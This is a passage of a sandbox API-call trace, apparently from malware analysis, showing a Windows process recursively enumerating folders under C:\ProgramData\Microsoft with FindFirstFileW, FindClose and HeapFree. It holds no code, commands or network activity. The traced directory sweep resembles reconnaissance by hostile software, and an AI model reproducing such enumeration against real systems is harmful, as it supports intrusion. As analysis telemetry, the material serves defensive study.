dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.076] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.076] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.078] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.078] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.078] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.078] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.078] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.078] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.079] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c1a0 [0112.079] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.079] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.079] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.080] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.082] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0xffffffff [0112.082] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.082] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.082] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.083] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c1a0 [0112.084] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.084] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0xffffffff [0112.084] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.084] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.085] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.086] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.138] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c1a0 [0112.139] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c220 [0112.468] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.469] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0112.469] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c220 [0112.470] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.471] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0112.471] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.471] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.471] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.471] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.472] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.473] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c1a0 [0112.473] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.473] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.473] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.473] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c1a0 [0112.474] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.474] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c1a0 [0112.474] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.475] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.475] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c1a0 [0112.475] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.476] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c1a0 [0112.476] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.476] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.476] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.476] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.477] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0xffffffff [0112.478] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.478] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.478] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c220 [0112.540] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.540] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.540] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.540] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.540] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.541] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.541] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.541] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.558] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.558] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\AIT\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c220 [0112.558] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.558] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c220 [0112.558] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.558] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c220 [0112.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0112.559] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.559] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.559] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.559] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DRM\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c220 [0112.560] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DRM\\Cache\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0112.561] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.561] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.561] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.561] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.561] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\GameExplorer\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c220 [0112.561] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.561] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.561] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0xffffffff [0112.561] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.561] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c260 [0112.650] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.652] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.652] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c260 [0112.652] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Manifest\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c2a0 [0112.652] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0112.652] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.652] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Sessions\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c2a0 [0112.653] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0112.653] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.653] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Upload\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c2a0 [0112.653] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0112.653] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.653] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.653] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.653] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c260 [0112.653] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c2a0 [0112.654] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c2e0 [0112.654] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x32ae54c | out: lpFindFileData=0x32ae54c) returned 0x29c320 [0112.654] FindClose (in: hFindFile=0x29c320 | out: hFindFile=0x29c320) returned 1 [0112.654] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4020090 | out: hHeap=0x1db0000) returned 1 [0112.654] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x32ae54c | out: lpFindFileData=0x32ae54c) returned 0x29c320 [0112.655] FindClose (in: hFindFile=0x29c320 | out: hFindFile=0x29c320) returned 1 [0112.655] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4020090 | out: hHeap=0x1db0000) returned 1 [0112.655] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\*", lpFindFileData=0x32ae54c | out: lpFindFileData=0x32ae54c) returned 0x29c320 [0112.655] FindClose (in: hFindFile=0x29c320 | out: hFindFile=0x29c320) returned 1 [0112.655] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4020090 | out: hHeap=0x1db0000) returned 1 [0112.655] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\*", lpFindFileData=0x32ae54c | out: lpFindFileData=0x32ae54c) returned 0x29c320 [0112.655] FindClose (in: hFindFile=0x29c320 | out: hFindFile=0x29c320) returned 1 [0112.656] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4020090 | out: hHeap=0x1db0000) returned 1 [0112.656] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0112.656] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0112.656] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c2e0 [0112.668] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0112.668] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0112.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c2e0 [0112.668] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0112.668] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0112.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c2e0 [0112.669] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0112.669] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0112.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c2e0 [0112.670] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0112.670] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0112.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c2e0 [0112.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\*", lpFindFileData=0x32ae54c | out: lpFindFileData=0x32ae54c) returned 0x29c1a0 [0112.671] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.671] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4020090 | out: hHeap=0x1db0000) returned 1 [0112.671] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0112.671] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0112.672] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c2e0 [0112.672] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0112.673] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0112.673] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c2e0 [0112.673] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0112.673] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0112.673] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c2e0 [0112.674] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0112.674] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0112.674] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0112.674] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.674] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.674] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.675] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c260 [0112.675] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.676] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.676] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c260 [0112.676] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c2a0 [0112.676] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0112.677] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.677] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c2a0 [0112.677] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0112.677] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0112.677] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.677] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.678] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.678] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.678] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0xffffffff [0112.679] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.679] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.679] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0xffffffff [0112.680] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.680] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c260 [0112.681] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.681] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.681] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.681] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.681] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0112.681] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c260 [0112.681] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.681] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0112.682] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0112.682] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0112.682] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0112.682] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0112.683] FindFirstFileW (in: 